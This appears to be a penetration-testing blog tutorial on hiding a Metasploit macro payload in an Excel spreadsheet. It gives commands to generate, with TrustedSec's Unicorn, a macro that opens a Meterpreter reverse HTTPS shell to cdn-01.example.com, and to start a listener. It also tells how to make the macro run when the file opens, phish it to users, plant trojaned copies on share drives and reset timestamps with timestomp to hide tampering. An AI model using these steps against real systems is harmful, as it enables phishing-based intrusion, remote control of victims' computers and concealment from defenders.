Macro Payloads in Excel with Metasploit
Need help with implementation or an upcoming project? We offer professional services at reasonable rates to help you with your next network rollout, security audit, architecture design, and more. Click here to find out more.
We've already covered using a Powershell script to gain access to a client's network, but a Powershell script certainly isn't the best thing to use during a phishing campaign. Most emails filters will remove batch, VB, and Powershell script attachments. Payloads disguised as Microsoft Office documents, relying on the GUI hiding the file extension (e.g. "2017_salaries.doc.exe"), will most likely get filtered if sent over email as well, but normal Microsoft Office documents are still fair game. We need to create (or find) a legitimate Excel document, add a Macro payload, give the client a reason to open it and enable Macros, then fire it off in a phishing email.
Once we have access to the client's network we can download some of their Excel files, add the same Macro used to gain initial access, then upload it back to a share drive so more users can execute it. Using timestomp we can set the timestamps back to what they were before so nothing seems off.
A quick Google search reveals a number of interesting .xls files that we could use. Use this Google search term to find interesting spreadsheets if you don't have one of your own handy:
We'll use TrustedSec's Magic Unicorn again to generate the Macro payload which runs a Powershell downgrade attack. On our Metasploit machine we'll clone the Magic Unicron Git repository:
git clone https://github.com/trustedsec/unicorn.git
Change directory to the new "unicorn" directory, list available options and example commands, and then we'll generate the payload:
cd unicorn python unicorn.py --help
Execute the following command to generate the Macro text, which we'll put in the Excel file:
python unicorn.py windows/meterpreter/reverse_https cdn-01.example.com 443 macro
This generates a Macro payload that initiates a reverse HTTPS connection on port 443 to our pentest server at cdn-01.example.com. Using a DNS name instead of an IP address means that we can move our pentest server to another IP address and clients will connect back to us as long as they can resolve our domain. Once the command completes we'll have a text file named "powershell_attack.txt" containing the Macro we need.
Copy the contents of the text file, and open up the Excel spreadsheet you found or made earlier. Use the keyboard shortcut Alt+F11 to open up the Macro editor in Excel. Double-click the "ThisWorkbook" object on the left side of the screen, and paste the contents of your Macro into the blank window that opens. At the very top of the Macro replace "Sub AutoOpen()" with "Sub Workbook_Open()" to ensure that the Macro will try to run automatically when the spreadsheet is opened. Save the spreadsheet as either .xls or .xslm format (.xlsx won't work), then we'll set up the listener in Metasploit using multi/handler:
msfconsole -q use multi/handler set payload windows/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 443 set ExitOnSession false set EnableStageEncoding true exploit -j
Now it's time to get the Excel spreadsheet into the client's hands and convince them to open it and run the Macro. The Powershell code calls back to our server and drops us to a Meterpreter shell if everything worked the way we want. Migrate your shell process so you don't lose connectivity, and work on escalating your access if the user who opened the spreadsheet isn't an administrator.